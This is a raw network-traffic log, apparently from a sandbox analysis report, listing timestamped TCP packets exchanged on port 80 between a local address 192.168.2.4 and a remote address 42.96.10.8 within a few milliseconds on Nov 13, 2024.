                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286082983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286083937 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286092997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286117077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286127090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286135912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286140919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286140919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286145926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286156893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286166906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286176920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286186934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286199093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286202908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286202908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286209106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286218882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286228895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286231995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286231995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286262035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286262035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286348104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286358118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286369085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286391973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286402941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286437035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286448002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286458969 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286463976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286463976 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286493063 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286506891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286518097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286537886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286546946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286556005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286557913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286557913 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286567926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286602020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286604881 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286613941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286633015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286643982 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286674976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286684990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286693096 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286704063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286705017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286705017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286720037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286732912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286732912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286776066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286787033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286796093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286806107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286814928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286819935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286886930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286907911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286919117 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286927938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286938906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286948919 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286959887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286969900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286988974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.286988974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287007093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287018061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287026882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287061930 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287102938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287113905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287122965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287133932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287143946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287146091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287146091 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287153006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287164927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287174940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287197113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287197113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287235022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287239075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287249088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287257910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287270069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287287951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287307978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287317991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287317991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287328005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287338972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287350893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287357092 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287362099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287379980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287391901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287401915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287406921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287406921 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287421942 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287424088 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287432909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287611961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287621021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287626982 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287630081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287640095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287652016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287659883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287671089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287672043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287681103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287692070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287698984 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287700891 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287712097 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287725925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287725925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287730932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287746906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287756920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287765980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287785053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287801027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287811041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287813902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287813902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287813902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287821054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287831068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287842035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287843943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287852049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287863016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287863970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287873983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287904978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287925959 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287936926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287949085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287950993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287971973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287982941 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287985086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.287992001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288002014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288037062 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288070917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288166046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288177013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288186073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288197041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288208008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288218021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288224936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288228989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288239002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288239002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288249016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288252115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288269043 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288284063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288294077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288302898 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288312912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288316011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288316011 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288322926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288333893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288361073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288372040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288381100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288383961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288383961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288391113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288400888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288410902 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288415909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288419962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288485050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.288485050 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289062023 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289072037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289082050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289132118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289132118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289151907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289160967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289180040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289190054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289199114 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289202929 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289208889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289220095 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289236069 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289259911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289880991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289891005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289900064 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289910078 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289921045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289988041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289988041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.289993048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290002108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290010929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290036917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290046930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290055037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290065050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290076017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290087938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290087938 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290100098 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290111065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290112019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290112019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290119886 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290132046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290174961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290184975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290194035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290199041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290199041 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290271997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290282965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290292025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290314913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290324926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290333986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290337086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290337086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290343046 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290354013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290365934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290388107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290388107 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290399075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290410042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290417910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290427923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290438890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290438890 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290498972 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290513992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290524006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290534019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290554047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290565014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290575027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290601969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290601969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290971041 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290981054 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.290991068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291008949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291008949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291013002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291024923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291034937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291044950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291054010 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291063070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291074991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291074991 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291081905 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291098118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291109085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291117907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291131020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291131020 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291137934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291153908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291166067 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291174889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291174889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291188002 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291198015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291207075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.291218042 CET804973342.96.10.8192.168.2.4
